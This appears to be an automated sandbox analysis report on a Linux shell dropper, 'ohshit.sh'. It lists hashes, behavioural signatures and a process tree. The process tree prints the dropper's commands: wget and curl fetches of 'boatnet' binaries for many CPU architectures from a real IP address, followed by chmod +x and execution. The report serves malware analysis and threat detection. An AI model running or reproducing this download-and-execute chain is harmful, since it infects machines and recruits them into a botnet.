Analysis
-
max time kernel
60s -
max time network
64s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system -
submitted
31-08-2024 21:05
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
ohshit.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
ohshit.sh
Resource
ubuntu2004-amd64-20240729-en
Behavioral task
behavioral8
Sample
ohshit.sh
Resource
ubuntu2204-amd64-20240611-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
fefdf2b7ece4d55bd47778b420f84011
-
SHA1
2823096e0538910f9b57ff9bae007ec655520fc3
-
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
-
SHA512
b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
-
Executes dropped EXE 12 IoCs
ioc pid Process /tmp/WTF 2828 WTF /tmp/WTF 2837 WTF /tmp/WTF 2846 WTF /tmp/WTF 2859 WTF /tmp/WTF 2869 WTF /tmp/WTF 2908 WTF /tmp/WTF 2926 WTF /tmp/WTF 2945 WTF /tmp/WTF 2979 WTF /tmp/WTF 2991 WTF /tmp/WTF 3001 WTF /tmp/WTF 3011 WTF -
Loads a kernel module 64 IoCs
Loads a Linux kernel module, potentially to achieve persistence
pid Process 2828 WTF 2828 WTF 2828 WTF 2828 WTF 2828 WTF 2828 WTF 2828 WTF 2828 WTF 2829 Process not Found 2829 Process not Found 2830 Process not Found 2831 Process not Found 2833 Process not Found 2829 Process not Found 2837 WTF 2837 WTF 2837 WTF 2837 WTF 2837 WTF 2838 Process not Found 2838 Process not Found 2838 Process not Found 2839 Process not Found 2840 Process not Found 2837 WTF 2837 WTF 2837 WTF 2841 Process not Found 2846 WTF 2846 WTF 2846 WTF 2846 WTF 2846 WTF 2846 WTF 2846 WTF 2846 WTF 2847 Process not Found 2847 Process not Found 2847 Process not Found 2848 Process not Found 2849 Process not Found 2850 Process not Found 2829 Process not Found 2829 Process not Found 2853 Process not Found 2838 Process not Found 2838 Process not Found 2854 Process not Found 2847 Process not Found 2847 Process not Found 2855 Process not Found 2829 Process not Found 2829 Process not Found 2856 Process not Found 2859 WTF 2859 WTF 2859 WTF 2859 WTF 2859 WTF 2859 WTF 2859 WTF 2859 WTF 2860 Process not Found 2860 Process not Found -
resource yara_rule behavioral9/files/fstream-1.dat upx -
Reads runtime system information 13 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.x86_64 wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.arm curl -
cURL User-Agent 13 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 6 curl/8.5.0 HTTP User-Agent header 15 curl/8.5.0 HTTP User-Agent header 34 curl/8.5.0 HTTP User-Agent header 37 curl/8.5.0 HTTP User-Agent header 43 curl/8.5.0 HTTP User-Agent header 9 curl/8.5.0 HTTP User-Agent header 19 curl/8.5.0 HTTP User-Agent header 22 curl/8.5.0 HTTP User-Agent header 30 curl/8.5.0 HTTP User-Agent header 40 curl/8.5.0 HTTP User-Agent header 3 curl/8.5.0 HTTP User-Agent header 12 curl/8.5.0 HTTP User-Agent header 27 curl/8.5.0
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Writes file to tmp directory
PID:2819 -
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:2821
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2822
-
-
/usr/bin/catcat boatnet.x862⤵PID:2826
-
-
/usr/bin/chmodchmod +x WTF boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2827
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Loads a kernel module
PID:2828
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Writes file to tmp directory
PID:2832
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2834
-
-
/usr/bin/chmodchmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2836
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Loads a kernel module
PID:2837
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:2842
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2843
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2845
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Loads a kernel module
PID:2846
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i4682⤵PID:2851
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2852
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2858
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Loads a kernel module
PID:2859
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.i6862⤵PID:2864
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2865
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2868
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2869
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:2874
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2880
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-timedated.service-mZxQTm systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2907
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2908
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:2913
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2917
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2925
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2926
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:2931
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2941
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2944
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2945
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:2950
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2951
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2978
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2979
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:2984
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2985
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:2990
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:2991
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:2996
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:2997
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:3000
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:3001
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:3006
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:3008
-
-
/usr/bin/chmodchmod +x WTF boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 gdm3-config-err-deWci9 gdm3-config-err-zcyG9f ohshit.sh snap-private-tmp systemd-private-39dd9de36b424919b7752968ab183e0b-ModemManager.service-Ffcoj9 systemd-private-39dd9de36b424919b7752968ab183e0b-colord.service-W05Kj7 systemd-private-39dd9de36b424919b7752968ab183e0b-polkit.service-nKBlGy systemd-private-39dd9de36b424919b7752968ab183e0b-power-profiles-daemon.service-MeykBv systemd-private-39dd9de36b424919b7752968ab183e0b-switcheroo-control.service-vltBte systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-logind.service-WrHcDX systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-oomd.service-BRFJB2 systemd-private-39dd9de36b424919b7752968ab183e0b-systemd-resolved.service-HZhYTO systemd-private-39dd9de36b424919b7752968ab183e0b-upower.service-eQdUSf2⤵PID:3010
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:3011
-
-
/usr/bin/wgetwget http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:3016
-
-
/usr/bin/curlcurl -O http://94.156.71.225/hiddenbin/boatnet.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:3019
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5ba2cb5b8715ba94c39e24e75a34d0ea0
SHA17182bf3b0e14e5224e741c15174c6e93f00df444
SHA25601fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
SHA5120c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d